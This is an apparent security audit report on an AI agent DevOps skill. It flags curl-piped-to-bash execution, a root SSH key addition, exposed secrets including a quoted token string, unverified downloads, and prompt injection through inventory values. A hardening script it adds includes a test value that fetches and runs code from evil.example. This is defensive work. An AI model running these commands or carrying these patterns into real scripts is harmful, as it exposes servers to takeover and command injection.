admin-devops

Fail

Audited by Gen Agent Trust Hub on Mar 10, 2026

Risk Level: HIGH
[REMOTE_CODE_EXECUTION] [COMMAND_EXECUTION] [CREDENTIALS_UNSAFE] [EXTERNAL_DOWNLOADS] [PROMPT_INJECTION]
Full Analysis
  • [REMOTE_CODE_EXECUTION]: The file templates/coolify-enhanced-quick-start.md contains the command pattern curl -fsSL https://raw.githubusercontent.com/YOUR-ORG/vibeskills-demo/main/.claude/skills/admin-devops/scripts/coolify-enhanced-setup.sh | bash. Piping a remote script straight into a shell executes whatever the URL serves at that moment, with the caller's privileges and with no checksum, signature or review step in between; the YOUR-ORG placeholder also means the URL resolves to whichever organization the user substitutes.
  • [COMMAND_EXECUTION]: The skill frequently uses sudo to run commands with elevated privileges. In particular, references/INSTALLATION.md (Coolify) instructs the user to append a public key to /root/.ssh/authorized_keys. An entry there gives whoever holds the matching private key persistent, passwordless root login until the line is removed, so the agent or the Coolify service gains standing root access to the server; the finding does not mention any from= or command= restrictions on the key.
  • [CREDENTIALS_UNSAFE]: The script scripts/kasm/lib/kasm-api.sh reads API keys and secrets directly from the local filesystem (/opt/kasm/current/conf/app/api.app.config.yaml); secrets read this way can end up in the agent's context, transcripts or logs. In addition, references/cloudflare-origin-certificates.md includes the hard-coded token string y^48ZTz3ZJ8J in an example, which may be a real credential and, even as a placeholder, invites being copied verbatim into scripts.
  • [EXTERNAL_DOWNLOADS]: Several reference files (e.g., references/contabo.md, references/kasm.md) instruct the user to download and install binary executables and scripts from external URLs. Some point to official repositories; others provide no checksum or signature and leave verifying the integrity of the source to the user.
  • [PROMPT_INJECTION]: The skill is susceptible to indirect prompt injection through the inventory file (.agent-devops.env) and the user-provided inputs it ingests. These values are interpolated into high-capability shell commands (e.g., ssh, oci, hcloud) across the management scripts with minimal sanitization, so a crafted value can become extra command-line options or an additional command.
      ◦ Ingestion points: .agent-devops.env (inventory), input-schema.json (user parameters).
      ◦ Boundary markers: generally absent; inputs are placed directly in bash variables that are then expanded on command lines.
      ◦ Capability inventory: subprocess calls to cloud CLIs (oci, hcloud, doctl, cntb), SSH, and network operations via curl in scripts such as oci-infrastructure-setup.sh and coolify-fix-dns.sh.
      ◦ Sanitization: limited to basic regex validation of some fields in the JSON schema; fields without a pattern, and values that never pass through the schema, reach the command line unchecked.
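The following shell script is an added example and is not code from the audited admin-devops skill or from this audit page. It shows the hardened counterpart to the REMOTE_CODE_EXECUTION finding (download to a file, compare against a digest pinned at review time, then execute, instead of curl | bash) and to the PROMPT_INJECTION finding (read .agent-devops.env without sourcing it, allowlist host and resource names, and end option parsing with -- before an inventory value is handed to ssh). The inventory format (plain KEY=VALUE lines), the allowlist patterns, the hostnames, and the pinned digest (the SHA-256 of the constructed file content "hello\n") are assumptions made for the example, not facts about the skill.

```shell
#!/usr/bin/env bash
# Added example, not code from the audited admin-devops skill: hardened
# counterparts to the curl|bash and inventory-interpolation findings.
# Assumptions: the inventory file is plain KEY=VALUE lines, host values must
# be DNS hostnames, and the operator has pinned a reviewed script's SHA-256.
set -eu

# --- curl|bash replacement: download, verify against a pinned digest, run ---
verify_sha256() {
    # $1 = file, $2 = expected lowercase hex digest; succeeds only on exact match
    local actual
    if command -v sha256sum >/dev/null 2>&1; then
        actual="$(sha256sum "$1" | cut -d' ' -f1)"
    else
        actual="$(shasum -a 256 "$1" | cut -d' ' -f1)"   # macOS fallback
    fi
    [ "$actual" = "$2" ]
}

fetch_verify_run() {
    # $1 = https URL, $2 = pinned digest. Refuses plain http, TLS < 1.2 and
    # any content whose digest differs from the pin (e.g. a moved branch).
    local url="$1" expected="$2" tmp rc=0
    tmp="$(mktemp)"
    if ! curl -fsSL --proto '=https' --tlsv1.2 -o "$tmp" -- "$url"; then
        rm -f "$tmp"; echo "download failed: $url" >&2; return 1
    fi
    if ! verify_sha256 "$tmp" "$expected"; then
        rm -f "$tmp"; echo "refusing to run $url: digest mismatch" >&2; return 1
    fi
    bash "$tmp" || rc=$?
    rm -f "$tmp"
    return "$rc"
}

# --- inventory handling: no sourcing, allowlists, '--' before values ---
inventory_get() {
    # $1 = inventory file, $2 = key; prints the raw value without evaluating it
    # (sourcing the file would execute $(...) and backticks it contains)
    awk -v k="$2" -F= '$1 == k { sub(/^[^=]*=/, ""); print; exit }' "$1"
}

is_hostname() {
    # letters, digits, dots, hyphens only; not empty, not an option-looking
    # "-..." value, at most 253 characters (assumed allowlist)
    case "$1" in
        ''|-*|*[!A-Za-z0-9.-]*) return 1 ;;
    esac
    [ "${#1}" -le 253 ]
}

is_resource_name() {
    # cloud server/volume names as passed to hcloud, doctl or cntb (assumed allowlist)
    case "$1" in
        ''|-*|*[!a-z0-9-]*) return 1 ;;
    esac
    [ "${#1}" -le 63 ]
}

ssh_run() {
    # $1 = host from inventory, $2... = remote command. '--' ends option
    # parsing, so a value such as -oProxyCommand=... can never become an option.
    local host="$1"; shift
    is_hostname "$host" || { echo "rejected host value: $host" >&2; return 1; }
    ssh -o BatchMode=yes -o StrictHostKeyChecking=yes -- "$host" "$@"
}

# Offline demonstration on constructed inputs; nothing is downloaded or ssh'd.
demo() {
    local f inv key v
    f="$(mktemp)"; inv="$(mktemp)"
    printf 'hello\n' > "$f"
    # digest below is the SHA-256 of the constructed content "hello\n"
    if verify_sha256 "$f" 5891b5b522d5df086d0ff0b110fbd9d21bb4fc7163af34d08286a2e846f6be03; then
        echo "digest ok: $f would be executed"
    fi
    # constructed inventory: one sane host and one injection attempt
    printf 'COOLIFY_HOST=coolify.example.internal\nOCI_HOST=$(curl -s evil.example|sh)\n' > "$inv"
    for key in COOLIFY_HOST OCI_HOST; do
        v="$(inventory_get "$inv" "$key")"
        if is_hostname "$v"; then echo "accept $key=$v"; else echo "reject $key=$v"; fi
    done
    rm -f "$f" "$inv"
}
demo
```

The two controls are independent: the pinned digest defends against the remote file changing after review, and the allowlist plus -- defends against an inventory or parameter value being parsed as an option or a shell command. Neither sanitizes the remote command itself; ssh joins its remaining arguments into one string for the remote shell, so operator-supplied command text still has to be trusted.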
Recommendations
  • AI detected serious security threats
Audit Metadata
Risk Level
HIGH
Analyzed
Mar 10, 2026, 03:49 AM